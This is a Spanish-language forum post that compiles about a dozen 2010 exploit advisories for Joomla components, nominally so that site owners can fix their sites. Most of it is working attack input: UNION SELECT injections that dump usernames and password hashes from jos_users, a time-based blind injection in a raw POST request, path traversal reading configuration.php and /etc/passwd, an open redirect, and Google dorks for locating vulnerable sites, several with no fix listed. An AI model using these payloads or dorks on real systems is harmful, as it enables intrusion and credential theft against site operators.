Recopilación de exploits joomla actuales
Publicado: 03 Sep 2010, 09:59
Para animar un poco la sección..
Joomla Component (com_jefaqpro) Multiple Blind SQL Injection Vulnerabilities:
Joomla PicSell Component (com_picsell) Local File Disclosure Vulnerability
Joomla 1.5 URL Redirecting Vulnerability
Joomla Component (com_zoomportfolio) SQL Injection Vulnerability
Joomla Component Biblioteca 1.0 Beta Multiple SQL Injection Vulnerabilities
Joomla Component com_zina SQL Injection Vulnerability
Joomla Component com_extcalendar Blind SQL Injection Vulnerability
Joomla Component (com_ongallery) SQL Injection Vulnerability
Joomla Component Jgrid 1.0 Local File Inclusion Vulnerability
Joomla Component (com_equipment) SQL Injection Vulnerability
Joomla Component Teams Multiple Blind SQL Injection Vulnerabilities
Joomla Yellowpages SQL Injection Vulnerability
Hay muchos usuarios que tienen joomla.. para que vean un poco los fallos que tienen.. y para que lo corrigan, saludos
Joomla Component (com_jefaqpro) Multiple Blind SQL Injection Vulnerabilities:
Código: Seleccionar todo
---------------------------------------------------------------------------------
Joomla Component JE FAQ Pro : Multiple Remote Blind Sql Injection
---------------------------------------------------------------------------------
Author : Chip D3 Bi0s
Group : LatinHackTeam
Email & msn : chipdebios[at]gmail[dot]com
Date : 2010-08-30
Critical Lvl : Moderate
Impact : Exposure of sensitive information
Where : From Remote
---------------------------------------------------------------------------
Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~~
Application : JE FAQ Pro
version : 1.5.0
Price : 1 year: 13.08$, 2 Year: 18.31$, 3 Year: 23.54$, 4 Year: 26.16$
Developer : J Extension
License : GPLv2 or later type : Commercial
Date Added : 28 August 2010
Download : http://www.jextn.com/joomla-faq-component-extensions-downloads/
Demo : http://www.joomla-faq-demo.jextn.com/
Description :
JE FAQ Pro is an easy to use but powerful and excellent FAQ management.
Our core competency from our front end and backend features will make you
to sit suitable because we take care of your needs in the FAQ Joomla component
needs. This is where we extending the suitability in Joomla.
Multiple Blind SQL Injection
http://site/path/index.php?option=com_jefaqpro&view=category&layout=categorylist&catid=2[bsql]
http://site/path/index.php?option=com_jefaqpro&view=category&layout=categorylist&task=lists&catid=2[bsql]
Joomla PicSell Component (com_picsell) Local File Disclosure Vulnerability
Código: Seleccionar todo
# Author: Craw
# Email: [email protected]
# Software Link: http://vm.xmlswf.com/index.php?option=com_content&view=article&id=104&Itemid=131
# Category: web applications
=======================================================
[+] ExploiT :
http://server/index.php?option=com_picsell&controller=prevsell&task=dwnfree&dflink=[File Disclosure]
[+] Example :
http://server/index.php?option=com_picsell&controller=prevsell&task=dwnfree&dflink=../../../configuration.php
=======================================================
Greetz @ LUXEMBOURG
=======================================================Joomla 1.5 URL Redirecting Vulnerability
Código: Seleccionar todo
============================================
Joomla! (Multiple) ExploiT
============================================
# Powered Joomla! 1.5 & All version Down (Multiple)
# Author: Mr.MLL
# Published: 2010-08-24
# Verified: yes
# Download Exploit Code
# Download N/A
===
# Software : http://www.joomla.org/download.html
# Vendor : http://www.joomla.org/
# Contact : [email protected]
===
<?php
}
if ( $return && !( strpos( $return, 'com_registration' ) || strpos( $return, 'com_login' ) ) ) {
// checks for the presence of a return url
// and ensures that this url is not the registration or login pages
// If a sessioncookie exists, redirect to the given page. Otherwise, take an extra round for a cookiecheck
if (isset( $_COOKIE[mosMainFrame::sessionCookieName()] )) {
mosRedirect( $return );
} else {
mosRedirect( $mosConfig_live_site .'/index.php?option=cookiecheck&return=' . urlencode( $return ) );
}
} else {
// If a sessioncookie exists, redirect to the start page. Otherwise, take an extra round for a cookiecheck
if (isset( $_COOKIE[mosMainFrame::sessionCookieName()] )) {
mosRedirect( $mosConfig_live_site .'/index.php' );
} else {
mosRedirect( $mosConfig_live_site .'/index.php?option=cookiecheck&return=' . urlencode( $mosConfig_live_site .'/index.php' ) );
}
}
} else if ($option == 'logout') {
$mainframe->logout();
// JS Popup message
if ( $message ) {
?>
=========
# ExploiT
http://127.0.0.1/path/index.php?option=cookiecheck&return=http://Google.com/
=========
Joomla Component (com_zoomportfolio) SQL Injection Vulnerability
Código: Seleccionar todo
view source
print?
---------------------------------------------------------------------------------
Joomla Component Zoom Portfolio (id) Remote Sql Injection
---------------------------------------------------------------------------------
Author : Chip D3 Bi0s
Group : LatinHackTeam
Email & msn : [email protected]
Date : 23 August 2010
Critical Lvl : Moderate
Impact : Exposure of sensitive information
Where : From Remote
---------------------------------------------------------------------------
Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~~
Application : Zoom Portfolio --Joomla Portfolio Component
version : 1.5
Price : $20.00
Developer : EGBZOOM
License : GPLv2 or later type : Commercial
Date Added : 21 August 2010
Download : http://www.egbzoom.com/joomla-portfolio-component.html
Description :
Zoom Portfolio enables you to display your portfolio in a "directory listing-like
presentation" with minimum effort.The Component has features like add category
add images,settings,add portfolio .Zoom Portfolio includes automatic thumbnail creation,
captioning, searching and more.It also includes the ability to modify and delete any
of your existing pages.
The Zoom Portfolio is an amazing example of what can be done online with your online
presence. It is directed at artists of all walks of life, it is very easy to install
and customize, and it is just simply stunning.
-------------------------
How to exploit
http://127.0.0.1/path/index.php?option=com_zoomportfolio&view=portfolio&view=portfolio&id=[sql]
-------------------------
Joomla Component Biblioteca 1.0 Beta Multiple SQL Injection Vulnerabilities
Código: Seleccionar todo
view source
print?
Biblioteca 1.0 Beta Joomla Component Multiple SQL Injection Vulnerabilities
Name Biblioteca
Vendor http://www.cielostellato.info
Versions Affected 1.0 Beta
Author Salvatore Fresta aka Drosophila
Website http://www.salvatorefresta.net
Contact salvatorefresta [at] gmail [dot] com
Date 2010-08-21
X. INDEX
I. ABOUT THE APPLICATION
II. DESCRIPTION
III. ANALYSIS
IV. SAMPLE CODE
V. FIX
I. ABOUT THE APPLICATION
________________________
Component that allows the automatic management of a
library in electronic format. It' can manage books and
their loans through an attractive graphical user
interface simple and usable.
II. DESCRIPTION
_______________
This component doesn't use the common Joomla's functions
to get the parameters's value from GET, POST etc.. and
all of these are not properly sanitised before being
used in SQL queries.
III. ANALYSIS
_____________
Summary:
A) Multiple Blind SQL Injection
B) Multiple SQL Injection
A) Multiple Blind SQL Injection
_______________________________
The parameter testo passed to bi.php (site and admin
frontends) is properly sanitised before being used in a
SQL query.This can be exploited to manipulate SQL queries
by injecting arbitrary SQL code.
B) Multiple SQL Injection
_________________________
The parameter testo passed to stampa.php, pdf.php and
models/biblioteca.php (when "view" is set to "biblioteca"
) is properly sanitised before being used in SQL queries.
This can be exploited to manipulate SQL queries by
injecting arbitrary SQL code.
IV. SAMPLE CODE
_______________
A) Multiple SQL Injection
http://host/path/components/com_biblioteca/views/biblioteca/tmpl/stampa.php?pag=1&testo=-a%25' UNION SELECT 1,username,password,4,5,6,7,8,9 FROM jos_users%23
http://host/path/components/com_biblioteca/views/biblioteca/tmpl/pdf.php?pag=1&testo=-a%25' UNION SELECT 1,username,password,4,5,6,7,8,9 FROM jos_users%23
http://host/path/index.php?option=com_biblioteca&view=biblioteca&testo=-a%25' UNION SELECT 1,username,password,4,5,6,7,8,9 FROM jos_users%23
V. FIX
______
No fix.
Joomla Component com_zina SQL Injection Vulnerability
Código: Seleccionar todo
# Exploit Title: Joomla Component com_zina SQL Injection Vulnerability
# Date: 21-08-2010
# Author: Th3 RDX
# Software Link:http://www.pancake.org/zina/
# Version: 2.x
# Tested on: Demo Site
# category: webapp
# Code : n/a
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
I Love Faith :)
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
L0v3 To: R00T, R45c4l, Agent: 1c3c0ld, Big Kid, Lucky
(Indishell.in)
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Big Hugs to >:D< : Br0wn Sug4r, Sid3^effects, L0rd CruSad3r, Sonic ,
r0073r(inj3ct0r.com)
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Gr33tz to ### Team I.C.A | www.IndiShell.in | Team I.C.W ###
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
##############################################################################
%//
----- [ Founder ] -----
Th3 RDX
----- [ E - mail ] -----
[email protected]
%\\
##############################################################################
##############################################################################
%//
----- [Title] -----
Joomla Component com_zina SQL Injection Vulnerability
----- [ Vendor ] -----
http://www.pancake.org/zina/
%\\
##############################################################################
##############################################################################
%//
----- [ Injection (s) ] -----
----- [ SQL Injection ] -----
Put [BSQLi CODE]
[Link] http://joomla/index.php?option=com_zina&view=zina&Itemid=9[SQLi CODE]
%\\
##############################################################################
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
=> PROUD TO BE AN INDIAN
=> c0d3 for motherland, h4ck for motherland
==> i'm little more than useless <==
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>.
Bug discovered : 21 August 2010
finish(0);
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
#End 0Day#Joomla Component com_extcalendar Blind SQL Injection Vulnerability
Código: Seleccionar todo
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
Joomla Component com_extcalendar Blind SQL Injection Vulnerability
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
# Date: 20/08/2010 0
# Author : Lagripe-Dz 1
# contact : [email protected] 8
# Home : Algeria 1
# Category: webapps/0day 0
# Tested on: [ win xp sp2 ] 8
# Dork allinurl:"com_extcalendar" 1
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
[+] Vulnerable File :
http://www.site.com/[PATH]/components/com_extcalendar/cal_popup.php?extmode=view&extid=[BLIND_SQL]
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
Greetz 2 Allah and Ramadan Karim
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0Joomla Component (com_ongallery) SQL Injection Vulnerability
Código: Seleccionar todo
===================================================
Joomla Component (com_ongallery) SQL Injection Vulnerability
===================================================
Author : _aL_Bayraqim_
Homepage : http://www.1923turk.com
BORDO BEREL?LER GRUP KOMUTANLIGI
..! _al_bayragim_ ..! ..! Corti ..! ..! Aytug_Han ..! ..! Montesque ..! ..! Em3rGeNcY ..!...!..KaraBulut....!..!...Ramses....!....!...Mü cahit...!
===================================================
[+]G00gle Dork :index.php?option=com_ongallery
[+] Vulnerable File :
http://site.com/index.php?option=com_ongallery&task=ft&id=-1[SQL]
[+] ExploiT :
http://site.com/index.php?option=com_ongallery&task=ft&id=-1+order+by+1--
http://site.com/index.php?option=com_ongallery&task=ft&id=-1+union+select+1--
===================================================
?eHiT GeLdi ÖLümLü YaLan, GiTTi ÖLümSüzLügü GerÇek. Siz HaYaT SüRen Le?Ler, SiZi Kim DiRiLTecek?..
=================================================== Joomla Component Jgrid 1.0 Local File Inclusion Vulnerability
Código: Seleccionar todo
Jgrid 1.0 Joomla Component Local File Inclusion Vulnerability
Name Jgrid
Vendor http://datagrids.clubsareus.org
Versions Affected 1.0
Author Salvatore Fresta aka Drosophila
Website http://www.salvatorefresta.net
Contact salvatorefresta [at] gmail [dot] com
Date 2010-08-14
X. INDEX
I. ABOUT THE APPLICATION
II. DESCRIPTION
III. ANALYSIS
IV. SAMPLE CODE
V. FIX
I. ABOUT THE APPLICATION
________________________
DATA GRID Component built on the popular EXTJS Framework.
II. DESCRIPTION
_______________
A parameter is not properly sanitised before being used
by the require_once function.
III. ANALYSIS
_____________
Summary:
A) Local File Inclusion
A) Local File Inclusion
_______________________
The controller parameter in jgrid.php is not sanitised
before being used by the PHP function's require_once().
This allows a guest to include local files. The following
is the affected code:
if($controller = JRequest::getVar('controller')) {
require_once (JPATH_COMPONENT.DS.'controllers'.DS.$controller.'.php');
}
IV. SAMPLE CODE
_______________
A) Local File Inclusion
http://site/path/index.php?option=com_jgrid&controller=../../../../../../../../etc/passwd%00
V. FIX
______
No fix.Joomla Component (com_equipment) SQL Injection Vulnerability
Código: Seleccionar todo
# Exploit Title : Joomla "com_equipment" Sql Injection Vulnerability
# Date : 16 - 8 - 2010
# Author : Forza-Dz
# Vendor : http://joomlaequipment.com/
# Version : All Versions
# Tested on : Win Sp2 and Mac
############################################################
Dork = inurl:"com_equipment"
############################################################
--- SQL Injection Vulenrability ---
SQL Injection Vulenrability component "com_equipment"
############################################################
===[ Exploit ]===
http://www.site.com/path/index.php?option=com_equipment&view=details&id=[SQL]
or
http://www.site.com/path/index.php?option=com_equipment&task=components&id=45&sec_men_id=[SQL]
############################################################
===[Injection]===
[SQL] = +Union+select+1,user(),3,4,5,6+from+jos_users--
[SQL] = +Union+select+1,2,user(),4,5,6,7,8,9,10,11,12,13,14,15,16,17+jos_users--
[SQL] = +Union+select+1,user(),3,4,5,6,7,8,9,10,11,12,13,14,15,16+from+jos_users--
############################################################
Greetz @ MCA-CRB All "DZ" "MusliM"
############################################################
======[saha fotorkom]======
############################################################Joomla Component Teams Multiple Blind SQL Injection Vulnerabilities
Código: Seleccionar todo
Teams 1_1028_100809_1711 Joomla Component Multiple Blind SQL Injection Vulnerabilities
Name Teams
Vendor http://www.joomlamo.com
Versions Affected 1_1028_100809_1711
Author Salvatore Fresta aka Drosophila
Website http://www.salvatorefresta.net
Contact salvatorefresta [at] gmail [dot] com
Date 2010-08-10
X. INDEX
I. ABOUT THE APPLICATION
II. DESCRIPTION
III. ANALYSIS
IV. SAMPLE CODE
V. FIX
I. ABOUT THE APPLICATION
________________________
Teams is a base application for entering leagues, teams,
players, uniforms, and games.
II. DESCRIPTION
_______________
Some parameters are not properly sanitised before being
used in SQL queries.
III. ANALYSIS
_____________
Summary:
A) Multiple Blind SQL Injection
A) Multiple Blind SQL Injection
_______________________________
Many parameters are not properly sanitised before being
used in SQL queries. This can be exploited to manipulate
SQL queries by injecting arbitrary SQL code.
IV. SAMPLE CODE
_______________
A) Multiple Blind SQL Injection
POST /index.php HTTP/1.1
Host: targethost
Content-Type: application/x-www-form-urlencoded
Content-Length: 205
FirstName=mario&LastName=rossi&Notes=sds&TeamNames[1]=on&UniformNumber[1]=1&Active=Y&cid[]=&PlayerID=-1 OR (SELECT(IF(0x41=0x41,BENCHMARK(99999999,NULL),NULL)))&option=com_teams&task=save&controller=player
V. FIX
______
No fix.Joomla Yellowpages SQL Injection Vulnerability
Código: Seleccionar todo
===============================================================
Joomla Component (com_yellowpages) SQL Injection Vulnerability
===============================================================
# Exploit Title : Joomla "com_yellowpages" Sql Injection Vulnerability
# Date : 9- 8 - 2010
# Author : _aL_bayraqim_
# BORDO BEREL?LER GRUP KOMUTANLIGI [..! _al_bayragim_ ..! ..! Corti ..! ..! Aytug_Han ..! ..! Montesque ..! ..! Em3rGeNcY ..!]
############################################################
Dork = inurl:/index.php?option=com_yellowpages
############################################################
--- SQL Injection Vulenrability ---
SQL Injection Vulenrability component "com_yellowpages"
http://site.com/index.php?option=com_yellowpages&cat=1923[SQL]
############################################################
===[ Exploit ]===
http://www.site.com/path/index.php?option=com_yellowpages&cat=-1923+UNION+SELECT 1,concat_ws(0x3a,username,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37+from+jos_users--
+Union+select+user()+from+jos_users--
############################################################
#.Türk o?lu, !!..Türk k?z? !!..Türklügünü Koru!..
############################################################Hay muchos usuarios que tienen joomla.. para que vean un poco los fallos que tienen.. y para que lo corrigan, saludos